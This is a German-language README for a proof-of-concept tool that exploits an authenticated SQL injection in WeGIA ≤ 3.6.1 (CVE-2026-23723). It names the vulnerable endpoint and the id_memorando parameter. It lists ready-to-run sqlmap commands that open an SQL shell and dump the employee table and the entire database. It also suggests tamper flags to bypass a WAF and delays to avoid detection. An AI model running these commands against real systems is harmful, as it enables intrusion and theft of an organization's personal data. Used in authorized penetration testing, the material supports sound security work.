
Dies ist ein leichtgewichtiges Python-Hilfsskript, das entwickelt wurde, um die Erstellung von sqlmap-kompatiblen PoC-Dateien für die authentifizierte, fehlerbasierte SQL-Injection-Schwachstelle in WeGIA (≤ 3.6.1) zu automatisieren, die als GHSA-xfmp-2hf9-gfjp identifiziert wurde.
Authentifizierte Error-basierte SQL-Injection in WeGIA ≤ 3.6.1
GHSA-xfmp-2hf9-gfjp | Offizielles Advisory
Ursprünglicher Autor / Melder des PoC: ViniCastro2001 GHSA veröffentlicht von: nilsonLazarin (Projektbetreuer)
Dieses leichtgewichtige Python-Skript automatisiert:
id_memorando=1* markiert)--sql-shell)requests-Bibliothek (in den meisten Penetration-Testing-Umgebungen bereits vorhanden)git clone https://github.com/Ch35h1r3c47/CVE-2026-23723-POC.git
cd CVE-2026-23723-POC
# Empfohlen: interaktive Passwortabfrage
python CVE-2026-23723.py --url http://target.com -u admin
# Passwort direkt angeben
python CVE-2026-23723.py --url http://target.com -u admin -p wegia
# Benutzerdefinierte Ausgabedatei
python CVE-2026-23723.py --url http://target.com -u admin -p wegia --output custom.req
Nach erfolgreicher Ausführung führt das Skript Folgendes aus:
Anmeldeversuch Erzeugt wegia_sqlmap.req (oder Ihren benutzerdefinierten Dateinamen) Zeigt sofort verwendbare sqlmap-Befehle an
# 1. Interaktive MySQL-ähnliche Shell (am meisten empfohlen)
sqlmap -r wegia_sqlmap.req --sql-shell --batch --dbms=mariadb
# 2. Aktuelle und alle Datenbanken anzeigen
sqlmap -r wegia_sqlmap.req --current-db --dbs --batch
# 3. Tabellen in der wegia-Datenbank auflisten
sqlmap -r wegia_sqlmap.req -D wegia --tables --batch
# 4. Bestimmte Tabelle dumpen (Beispiel: funcionario)
sqlmap -r wegia_sqlmap.req -D wegia -T funcionario --dump --threads=2 --batch
# 5. Gesamte wegia-Datenbank dumpen (Vorsicht!)
sqlmap -r wegia_sqlmap.req -D wegia --dump-all --threads=3 --batch --output-dir=./dump
Optionale sqlmap-Flags:
--proxy=http://127.0.0.1:8080 (über Burp/ZAP)
--tamper=space2comment,randomcase (grundlegende WAF-Umgehung)
--delay=1 (verlangsamen, um Erkennung zu vermeiden)
Wenn die automatische Anmeldung fehlschlägt Manuell über den Browser anmelden → vollständigen Cookie-Header kopieren → sqlmap direkt ausführen:
sqlmap -u "http://target.com/controle/control.php?nomeClasse=Atendido_ocorrenciaControle&metodo=listarTodosComAnexo&id_memorando=*" \
--cookie="PHPSESSID=xxxxxxxx; other_cookie=yyy" \
--sql-shell --batch
Rechtlicher Hinweis Dieses PoC dient ausschließlich Bildungs- und autorisierten Penetrationstest-Zwecken. Die unbefugte Verwendung gegen ein beliebiges System ist illegal und verboten. Der Autor und die Mitwirkenden übernehmen keine Verantwortung für Missbrauch oder verursachte Schäden. Referenzen
GHSA-xfmp-2hf9-gfjp CVE-2026-23723